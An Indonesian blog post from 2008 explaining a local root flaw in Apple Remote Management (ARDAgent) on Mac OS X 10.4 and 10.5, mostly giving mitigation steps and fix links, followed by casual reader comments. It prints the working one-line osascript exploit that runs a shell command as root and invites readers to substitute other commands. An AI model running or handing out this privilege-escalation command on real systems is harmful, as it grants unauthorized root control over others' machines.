Celah di Local Root dan Remote Management di Mac OS X 10.4 dan 10.5….

Posted: June 26, 2008 in Mac OSX86, Technology, Tutor
Tags: , , ,

tadi pagi iseng main2 kesite echo.or.id, dah lama juga ga main kesite ini..

trus baca, salah satu artikel yg berjudul Celah Local Root di Mac OS X 10.4 dan 10.5, berhubung gw pemakai Macintosh versi Hacknya πŸ˜€ heheheh….

Celah ini terdapat pada aplikasi Remote Management di Apple Mac OS X 10.4 dan 10.5, untuk terhindar dari bug ini cukup non aktifkan fitur Remote Management…..

Bagaimana jika kita tetap membutuhkan Aplikasi Remote Management.. solusinya ada di link dibawah ini πŸ˜‰

http://www.tuaw.com/ardfix/

http://it.slashdot.org/article.pl?no_d2=1&sid=08/06/18/1919224

pada link diatas ada cara mencegahnya, hmmm pasti pada males bukanya kan, ya udah gw tampilin dibawah πŸ˜‰ :

Leopard: System Prefs, Sharing pane

Buka System Preferences -> Sharing Pane, check list Remote Management untuk mengaktifkan service /aplikasi ini

Make sure no permissions are active

pastikan semua hak akses di non aktifkan, dan check list hak akses yg benar2 dibutuhkan saja.

Extra safety…

masukan list user yg bisa menjalankan fitur Remote Management

Tiger: “Apple Remote Desktop” setting

untuk pengguna Tiger 10.4, cek list Apple Remote Desktop untuk mengaktifkan fitur ini

User permissions all off

uncheck semua hak akses

Done… fitur Remote Management bisa tetep di gunakan, dan tetep safe πŸ˜€

Celah di local Root, hanya bisa di eksekusi via Terminal, cara eksekusinya adalah :

user$osascript -e ‘tell app “ARDAgent” to do shell script “whoami” root

command “whoami” bisa di rubah, sesuai dengan kreatifitas masing2 πŸ˜‰

Yups that’s it :D… smoga postingan ini bisa berguna untuk pemakai Macintosh dan Hackintosh πŸ˜‰

sumber :

http://www.tuaw.com/ardfix/

http://it.slashdot.org/article.pl?no_d2=1&sid=08/06/18/1919224

Comments
  1. Sue Massey says:

    I discovered your homepage by coincidence.
    Very interesting posts and well written.
    I will put your site on my blogroll.
    πŸ™‚

  2. irvan says:

    keren bo

    klo bisa sedikit petuah buat linuxer dan unix yawhh yah πŸ˜€

    maklum buth pencerahan πŸ˜€

  3. AdziE says:

    jah om irvan echo kah :o, tengkyu2 dah mampir di gubuk saya ini ^:)^…

    itu dari echo om, dari postingannya om y3dips :D, cuma saya quote lagi ke blog saya… linux n unix yawh πŸ˜€ :D.. blom banyak pengalaman utk tuning2 Linux n Unix…

    utk Unix sama Linux sih paling system Disk Utilization aja, krn dulu pernah gawe di bagian Storage System :”>… tp msh blom advanced2 bgt πŸ˜€ πŸ˜€

  4. Black_Claw says:

    IRVAN –X– AMMAR

    MWAKAKAKAKAAAAAAA!!!

    OYEA d00d!!!

    *tabur garam di luka lama*
    *bakar semua kabel dan tebang meja wap*

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s